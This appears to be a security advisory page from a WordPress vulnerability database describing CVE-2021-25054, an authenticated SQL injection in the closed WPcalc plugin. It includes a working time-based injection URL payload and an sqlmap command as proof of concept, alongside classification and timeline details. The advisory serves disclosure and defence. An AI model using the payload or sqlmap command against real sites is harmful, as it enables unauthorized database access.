logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

WPcalc <= 2.1 - Authenticated SQL Injection

Description

The plugin does not sanitize user input into the 'did' parameter and uses it in a SQL statement, leading to an authenticated SQL Injection vulnerability.

Plugin author closed the plugin.

Proof of Concept

http://www.example.com/wp-admin/admin.php?page=wpcalc&info=del&did=1 AND (SELECT 7156 FROM (SELECT(SLEEP(5)))MIkl)

or, using the sqlmap tool:

./sqlmap.py -r request.txt -dbms=mysql --current-user -b -p did --batch --flush-session

Affects Plugins

wpcalc

No known fix - plugin closed

References

CVE

CVE-2021-25054

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

Miscellaneous

Original Researcher

0xdecafbad

Verified

Yes

WPVDB ID

200969eb-e2a4-4200-82d7-0c313de089af

Timeline

Publicly Published

2021-12-06 (about 1 months ago)

Added

2021-12-09 (about 1 months ago)

Last Updated

2021-12-09 (about 1 months ago)

Our Other Services

WPScan WordPress Security Plugin